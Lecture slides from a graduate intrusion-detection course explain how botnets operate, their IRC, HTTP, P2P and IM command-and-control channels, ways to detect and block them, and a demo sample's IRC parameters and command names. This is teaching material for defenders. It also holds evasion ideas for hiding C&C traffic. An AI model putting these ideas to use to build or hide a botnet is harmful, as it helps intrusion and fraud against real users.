ISA 674
Intrusion Detection
Botnets: "
Analysis of Command and Control Channels
& Signature Generation!
Arnur Tokhtabayev, GMU!
�Malware Bot(net) Operation
1.
2.
Bot (trojan) delivery (e.g. driveby via web browser, network
service exploit, infection via USB
drive)!
Bot setup - turns host to
zombie, connect to Botnet
(persist, conceal and
communicate)!
Stand-by mode (optional)!
4. Execute commands (e.g.
spamming, DoS, credential theft)!
3.
Picture source: Wikipedia
(Tom-B)
�How Botnets Work
1.
2.
3.
4.
5.
Botmaster exploits the
vulnerability on the victim.!
The victim downloads the
actual bot binary. !
Bot contact the IRC server
address in the executable,
including resolving the DNS
name.!
The bot joins an IRC channel.!
The botmaster sends out
commands via IRC channel.!
�Bot C&C channel Requirements
Stealthy !
Avoid custom ports!
Merge normal traffic !
Availability!
Common (public) protocol/service!
Legitimate access to channel (Windows API) !
Usability!
Quality of service (application level protocol)!
Command multicasting/broadcasting (control scalability)!
Centralized vs P2P!
Bandwidth is not important!
!
�Bot C&C channels
Modern Techniques Trend
Invisibility
DNS
Social Net
P2P
HTTP
IRC
Conficker (10.5 Mil bots)
TDL4 (4.5 Mil bots, 2010)
BredoLab (30 Mil bots, 2009)
Zeus (3.6 Mil)
Agobot, Sdbot, m-IRC (<1 mil, 2004)
Zeus (3.6 Mil)
Time
�The Threats from Botnets
Types of attack!
DDoS
attacks. !
Spam. !
Clickfraud.!
Spreading new malware. !
Cracking.!
Manipulating online polls!
�Botnet Detection
IRC botnet!
IRC port, may be on non-standard port!
Monitor IRC payload for known command!
Behavioral characteristics !
Response !
n
Long standing connection!
Bots are not talkative!
Machine learning techniques!
Constant response time, fast join!
Using labeled data to build classifier.!
Track the botnet by honeypot!
Use honeypot to get infected!
�Why IRC?
Original motivation
Internet Relay Chat (standard protocol)!
IRC is not firewalled by most users!
IRC traffic load is predictable (between 2-3 pm,
e.g. office usage pattern, do not cause anomaly)!
IRC endpoints are 100% legal (known IRC
servers)!
C&C commands blend in normal data traffic!
!
Practically easy to avoid detection (network-based
IDS, e.g. Snort)!
�IRC Bot operation (server
independence)
Source: http://www.windowsecurity.com/
�Fighting with IRC C&C
Practical approaches
Prevention:!
Block IRC (port 6667)!
Allow only certain IRC channels !
IRC channel remap via IRC proxy (potential)!
Detection: !
Anomaly in IRC usage pattern (e.g. night time IRC connections from
office computers, previously unknown IRC channel, strange IRC
server)!
IRC message correlation (e.g. consistent command/replay pattern)!
!
Can black hats strike back? !
!
Smart IRC C&C:!
Randomize IRC command and replay (generate unique communication
protocol at each host)!
Collect usage pattern and blend in (utilize/piggyback users IRC
channels) !
�Network Intrusion Detection System (NIDS)
BotNet C&C detection
NIDS
Snort, Bro
Traffic analysis
Network traffic (packet) capture
Wireshark,
tcpdump,
ngrep,
Ettercap*
libpcap,
WinPcap
�Bot generators (SpyEye)
Screenshots were obtained from public web-sites
�Analyzing IRC Bot
Tasks: !
1. Reverse Engineer the image !
IRC server ID, channel and user names
(generator)!
C&C Commands!
2. Set up an environment (fake IRC server, IRC client)!
3. Trigger bots commands (IRC command messages
and observe malwares behavior)!
�Demo: bBot (rBot based)
Parameter
Value
IRC session:
IRC server name
botirc.net (static)
IRC channel name
#test
IRC user name
[M]bBot|XXXX
C&C commands:
Log keys
keylog file
Remote access to host
httpserver
Download a file
d0wnl04d
�Control and Command Infrastructure
IRC-based !
P2P botnet!
Servent
bots!
Client bots!
Communicate via peer
list.!
n
Only servent bots are in
peer list!
Avoid
single point of
failure.!
�Control and Command Infrastructure
HTTP botnet!
Bot contact C&C server with its info embedded in URL.!
Attackers send commands via HTTP response.!
Communicating in between HTTP's noise!
Bobax Trojan!
�Control and Command infrastructure
IM botnet!
Send command to all bots on contact list, via instant message.!
The botmaster only need to send to a small number of message.!
n
Each recipients can then spread to their own contacts, and then go on.!
Sdbot, spreading via AIM.!
�Contact info
Dr. Arnur Tokhtabayev, !
Center for Secure Information Systems !
George Mason University"
Computer Science Department"
Research I, Rm 435!
E-mail:!
atokhtab@gmu.edu!
arnur78@gmail.com!
